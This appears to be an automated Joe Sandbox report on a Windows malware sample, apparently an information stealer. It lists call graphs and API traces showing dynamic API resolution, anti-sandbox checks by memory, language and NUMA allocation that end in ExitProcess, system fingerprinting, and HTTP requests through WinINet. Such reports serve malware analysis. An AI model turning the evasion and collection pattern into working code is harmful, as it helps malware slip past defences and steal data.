                                    execution_graph 36296 be6c90 36341 bd22a0 36296->36341 36320 be6d04 36321 beacc0 4 API calls 36320->36321 36322 be6d0b 36321->36322 36323 beacc0 4 API calls 36322->36323 36324 be6d12 36323->36324 36325 beacc0 4 API calls 36324->36325 36326 be6d19 36325->36326 36327 beacc0 4 API calls 36326->36327 36328 be6d20 36327->36328 36493 beabb0 36328->36493 36330 be6dac 36497 be6bc0 GetSystemTime 36330->36497 36331 be6d29 36331->36330 36333 be6d62 OpenEventA 36331->36333 36335 be6d79 36333->36335 36336 be6d95 CloseHandle Sleep 36333->36336 36340 be6d81 CreateEventA 36335->36340 36339 be6daa 36336->36339 36338 be6db6 CloseHandle ExitProcess 36339->36331 36340->36330 36694 bd4610 36341->36694 36343 bd22b4 36344 bd4610 2 API calls 36343->36344 36345 bd22cd 36344->36345 36346 bd4610 2 API calls 36345->36346 36347 bd22e6 36346->36347 36348 bd4610 2 API calls 36347->36348 36349 bd22ff 36348->36349 36350 bd4610 2 API calls 36349->36350 36351 bd2318 36350->36351 36352 bd4610 2 API calls 36351->36352 36353 bd2331 36352->36353 36354 bd4610 2 API calls 36353->36354 36355 bd234a 36354->36355 36356 bd4610 2 API calls 36355->36356 36357 bd2363 36356->36357 36358 bd4610 2 API calls 36357->36358 36359 bd237c 36358->36359 36360 bd4610 2 API calls 36359->36360 36361 bd2395 36360->36361 36362 bd4610 2 API calls 36361->36362 36363 bd23ae 36362->36363 36364 bd4610 2 API calls 36363->36364 36365 bd23c7 36364->36365 36366 bd4610 2 API calls 36365->36366 36367 bd23e0 36366->36367 36368 bd4610 2 API calls 36367->36368 36369 bd23f9 36368->36369 36370 bd4610 2 API calls 36369->36370 36371 bd2412 36370->36371 36372 bd4610 2 API calls 36371->36372 36373 bd242b 36372->36373 36374 bd4610 2 API calls 36373->36374 36375 bd2444 36374->36375 36376 bd4610 2 API calls 36375->36376 36377 bd245d 36376->36377 36378 bd4610 2 API calls 36377->36378 36379 bd2476 36378->36379 36380 bd4610 2 API calls 36379->36380 36381 bd248f 36380->36381 36382 bd4610 2 API calls 36381->36382 36383 
Execution graph (node/edge data from the interactive graph viewer, condensed to the routines and API calls it records):

bd24a8-bd26ce and bd26f0-bd45f9: long straight-line chains of calls into bd4610, which itself calls RtlAllocateHeap (bd4621) and VirtualProtect (bd4671).
be9bb0: GetPEB (be9aa0), 21 API calls (be9bdc), LoadLibraryA x5 (be9de3), then runs of GetProcAddress (be9e44-be9ee2). A second resolver at be9f20 (43 API calls at be9f30) follows the same pattern, with GetProcAddress runs at bea3dc-bea9b7.
bd11d0: GetSystemInfo (bd1160) -> ExitProcess (bd117c); GetCurrentProcess + VirtualAllocExNuma (bd1110) -> ExitProcess (bd1141); VirtualAlloc/VirtualFree (bd10a0); GlobalMemoryStatusEx (bd1233) -> __aulldiv (bd1249) -> ExitProcess (bd1292); GetUserDefaultLangID (be6a10) with five ExitProcess branches (be6a43, be6a4d, be6a57, be6a61, be6a6b); GetProcessHeap/RtlAllocateHeap/GetUserNameA (be79e0) -> ExitProcess (bd11c4) on one branch; GetProcessHeap/RtlAllocateHeap/GetComputerNameA (be7a70).
be7690: GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap/RtlAllocateHeap (be778c), wsprintfA (be77b8).
be8cf0: GetSystemTime. be6c38: sscanf, then SystemTimeToFileTime x2 (be6c4a) -> ExitProcess (be6c78) on one branch.
bd48d0: InternetCrackUrlA (bd4898), InternetOpenA + StrCmpCA (bd495b), InternetConnectA (bd4af3), HttpOpenRequestA (bd4b23), HttpSendRequestA (bd4e63), InternetReadFile loop (bd4e82), InternetCloseHandle (bd4eb7, bd4f0e, bd4f1b); bda210: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree.
be19f0: StrCmpCA (be1a14) -> ExitProcess (be1a1f), then nine further StrCmpCA branches (be1aad-be1bc0). be5760: StrCmpCA at be5893, be58f0, be59da, be5aa6, be5b8f, be5c5b; Sleep (be5c66); be5440 (20 API calls), be5510 (25 API calls).
Large routines called in sequence from be5d60 (call counts as labelled in the graph): be1c60 (115 API calls), be08a0 (286), bd7770 (108), be49d0 (88), be4010 (67), be4fc0 (65), be5190 (63), be4e00 (61), be52a0 (61), bd1ec0 (59), be4300 (57), be91a0 (46), be5350 (45), bd59b0 (34, called repeatedly), be37b0 (31), be1520 (19), be68d0 (9), bd5000 (7); be0fc0, be1170, be1280, be13c0 (StrCmpCA/lstrlen/lstrcpy).
String helpers beaa50, beaab0, beab30, beabb0, beac30, beacc0, bd1590, bd16b0, be6680: lstrcpy, lstrcat, lstrlen.
37718->37719 37719->37717 37720->37698 37721->37638

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 be9bb0-be9bc4 call be9aa0 663 be9bca-be9dde call be9ad0 GetProcAddress * 21 660->663 664 be9de3-be9e42 LoadLibraryA * 5 660->664 663->664 666 be9e5d-be9e64 664->666 667 be9e44-be9e58 GetProcAddress 664->667 669 be9e96-be9e9d 666->669 670 be9e66-be9e91 GetProcAddress * 2 666->670 667->666 671 be9e9f-be9eb3 GetProcAddress 669->671 672 be9eb8-be9ebf 669->672 670->669 671->672 673 be9ed9-be9ee0 672->673 674 be9ec1-be9ed4 GetProcAddress 672->674 675 be9ee2-be9f0c GetProcAddress * 2 673->675 676 be9f11-be9f12 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,018B2148), ref: 00BE9BF1
                                    • GetProcAddress.KERNEL32(74DD0000,018B21F0), ref: 00BE9C0A
                                    • GetProcAddress.KERNEL32(74DD0000,018B2178), ref: 00BE9C22
                                    • GetProcAddress.KERNEL32(74DD0000,018B22B0), ref: 00BE9C3A
                                    • GetProcAddress.KERNEL32(74DD0000,018B2190), ref: 00BE9C53
                                    • GetProcAddress.KERNEL32(74DD0000,018B8E00), ref: 00BE9C6B
                                    • GetProcAddress.KERNEL32(74DD0000,018A60D0), ref: 00BE9C83
                                    • GetProcAddress.KERNEL32(74DD0000,018A6430), ref: 00BE9C9C
                                    • GetProcAddress.KERNEL32(74DD0000,018B22C8), ref: 00BE9CB4
                                    • GetProcAddress.KERNEL32(74DD0000,018B1FE0), ref: 00BE9CCC
                                    • GetProcAddress.KERNEL32(74DD0000,018B1FF8), ref: 00BE9CE5
                                    • GetProcAddress.KERNEL32(74DD0000,018B2010), ref: 00BE9CFD
                                    • GetProcAddress.KERNEL32(74DD0000,018A62D0), ref: 00BE9D15
                                    • GetProcAddress.KERNEL32(74DD0000,018B2028), ref: 00BE9D2E
                                    • GetProcAddress.KERNEL32(74DD0000,018B2040), ref: 00BE9D46
                                    • GetProcAddress.KERNEL32(74DD0000,018A60F0), ref: 00BE9D5E
                                    • GetProcAddress.KERNEL32(74DD0000,018B21A8), ref: 00BE9D77
                                    • GetProcAddress.KERNEL32(74DD0000,018B2058), ref: 00BE9D8F
                                    • GetProcAddress.KERNEL32(74DD0000,018A6230), ref: 00BE9DA7
                                    • GetProcAddress.KERNEL32(74DD0000,018B21C0), ref: 00BE9DC0
                                    • GetProcAddress.KERNEL32(74DD0000,018A6310), ref: 00BE9DD8
                                    • LoadLibraryA.KERNEL32(018B2340,?,00BE6CA0), ref: 00BE9DEA
                                    • LoadLibraryA.KERNEL32(018B23A0,?,00BE6CA0), ref: 00BE9DFB
                                    • LoadLibraryA.KERNEL32(018B2370,?,00BE6CA0), ref: 00BE9E0D
                                    • LoadLibraryA.KERNEL32(018B22E0,?,00BE6CA0), ref: 00BE9E1F
                                    • LoadLibraryA.KERNEL32(018B22F8,?,00BE6CA0), ref: 00BE9E30
                                    • GetProcAddress.KERNEL32(75A70000,018B2388), ref: 00BE9E52
                                    • GetProcAddress.KERNEL32(75290000,018B2358), ref: 00BE9E73
                                    • GetProcAddress.KERNEL32(75290000,018B2310), ref: 00BE9E8B
                                    • GetProcAddress.KERNEL32(75BD0000,018B2328), ref: 00BE9EAD
                                    • GetProcAddress.KERNEL32(75450000,018A6390), ref: 00BE9ECE
                                    • GetProcAddress.KERNEL32(76E90000,018B8D60), ref: 00BE9EEF
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00BE9F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00BE9EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 74f2e7ba59a793f284fc2e2650b4ecfad9f5fb30b8c6ef08adf0897ff79baa06
                                    • Instruction ID: 456349d0ecbfa078bf59605b0433c5eae62a3ba0f8a84c8b47a20e1086a99be0
                                    • Opcode Fuzzy Hash: 74f2e7ba59a793f284fc2e2650b4ecfad9f5fb30b8c6ef08adf0897ff79baa06
                                    • Instruction Fuzzy Hash: 45A152B66092009FC344DF6BEC88A667BF9A79F341714851AB989E3270D734B94DCF60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 bd4610-bd46e5 RtlAllocateHeap 781 bd46f0-bd46f6 764->781 782 bd46fc-bd479a 781->782 783 bd479f-bd47f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD465E
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BD47EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4707
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: efb7fa67f3413938bbbb1812eac62ca20a030de0e89dbf8c9d66c1f190ee94fb
                                    • Instruction ID: c54efcf8649bb9d7288f2293cf56bb811c089928c054cefa4a96cf78acceabd5
                                    • Opcode Fuzzy Hash: efb7fa67f3413938bbbb1812eac62ca20a030de0e89dbf8c9d66c1f190ee94fb
                                    • Instruction Fuzzy Hash: 8F41F2617C2708EAC634B7B4A84DEAD77966F83740FA07AE0FB0453290CBB0656855A5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 bd62d0-bd635b call beaab0 call bd4800 call beaa50 InternetOpenA StrCmpCA 1040 bd635d 1033->1040 1041 bd6364-bd6368 1033->1041 1040->1041 1042 bd636e-bd6392 InternetConnectA 1041->1042 1043 bd6559-bd6575 call beaab0 call beab10 * 2 1041->1043 1044 bd654f-bd6553 InternetCloseHandle 1042->1044 1045 bd6398-bd639c 1042->1045 1061 bd6578-bd657d 1043->1061 1044->1043 1047 bd639e-bd63a8 1045->1047 1048 bd63aa 1045->1048 1050 bd63b4-bd63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 bd63e8-bd63ec 1050->1052 1053 bd6545-bd6549 InternetCloseHandle 1050->1053 1056 bd63ee-bd640f InternetSetOptionA 1052->1056 1057 bd6415-bd6455 HttpSendRequestA HttpQueryInfoA 1052->1057 1053->1044 1056->1057 1059 bd647c-bd649b call be8ad0 1057->1059 1060 bd6457-bd6477 call beaa50 call beab10 * 2 1057->1060 1066 bd649d-bd64a4 1059->1066 1067 bd6519-bd6539 call beaa50 call beab10 * 2 1059->1067 1060->1061 1070 bd6517-bd653f InternetCloseHandle 1066->1070 1071 bd64a6-bd64d0 InternetReadFile 1066->1071 1067->1061 1070->1053 1076 bd64db 1071->1076 1077 bd64d2-bd64d9 1071->1077 1076->1070 1077->1076 1080 bd64dd-bd6515 call beacc0 call beabb0 call beab10 1077->1080 1080->1071
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • InternetOpenA.WININET(00BF0DFF,00000001,00000000,00000000,00000000), ref: 00BD6331
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD63D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BD640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD6421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BD644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BD64BD
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6549
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 796e588fe414e66f6982d60c19dc250e9acaf8418bfb94b87bd1cace653b91bb
                                    • Instruction ID: d7d6ddbd8057a324c595a4755afb8006f2e1d848b6fc586100dcfddbb34815ef
                                    • Opcode Fuzzy Hash: 796e588fe414e66f6982d60c19dc250e9acaf8418bfb94b87bd1cace653b91bb
                                    • Instruction Fuzzy Hash: 71715F71A00218EFDB14DFA5DC55BEEB7B8EB54700F1040D9F10A6B290DB746A84CF51

Control-flow Graph
                                    control_flow_graph 1356 be7690-be76da GetWindowsDirectoryA 1357 be76dc 1356->1357 1358 be76e3-be7757 GetVolumeInformationA call be8e90 * 3 1356->1358 1357->1358 1365 be7768-be776f 1358->1365 1366 be778c-be77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 be7771-be778a call be8e90 1365->1367 1368 be77b8-be77e8 wsprintfA call beaa50 1366->1368 1369 be77a9-be77b6 call beaa50 1366->1369 1367->1365 1377 be780e-be781e 1368->1377 1369->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BE76D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BE770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE779A
                                    • wsprintfA.USER32 ref: 00BE77D0
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
• Associated: the same fifteen dump regions listed for the function above (bases 00BD0000, 00BFC000, 00D0D000, 00D19000, 00D3E000, 00EA6000, 00EBA000, 0104D000, 01125000, 0114D000, 01154000, 01164000, 01165000, 01307000, 01308000)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 0ff8df96ef8c9cc18a795bf71a1b2aafd934d95c095d783ffbbcb42a3f7a2f7a
                                    • Instruction ID: f09acd70ad4a40cdba368a2e07ea1c2550fcab6883b9944046bb70f62c215f2e
                                    • Opcode Fuzzy Hash: 0ff8df96ef8c9cc18a795bf71a1b2aafd934d95c095d783ffbbcb42a3f7a2f7a
                                    • Instruction Fuzzy Hash: 384181B1D442889FDB10DB95CC85BEEBBB8AF09704F1001D9F609BB280DB746A44CBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BD11B7), ref: 00BE7A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7A17
